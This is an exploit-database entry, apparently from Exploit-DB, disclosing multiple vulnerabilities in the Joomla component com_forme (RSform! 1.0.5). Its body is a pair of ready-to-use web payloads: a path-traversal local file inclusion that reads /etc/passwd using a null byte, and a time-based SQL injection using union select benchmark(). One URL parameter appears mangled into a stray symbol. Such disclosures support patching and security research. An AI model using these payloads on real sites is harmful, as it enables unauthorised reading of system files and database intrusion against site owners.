Joomla! Component com_forme 1.0.5 - Multiple Vulnerabilities
Author: jdc type: webapps platform: php port: date_added: 2010-11-06 date_updated: 2016-11-02 verified: 1 codes: OSVDB-69069;OSVDB-69068 tags: aliases: screenshot_url: application_url: raw file: 15443.txt
# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities # Date: 06.11.2010 # Author: jdc # Software Link: http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265 # Version: 1.0.5 Local File Include ------------------ ?option=com_forme ⟨=../../../../../../../../../etc/passwd%00 SQL Injection ------------- ?option=com_forme ⟨=-1' union select benchmark(1000000,md5(1)) -- ' NOTE: RSform! Pro is not affected... 6 Nov 2010 jdc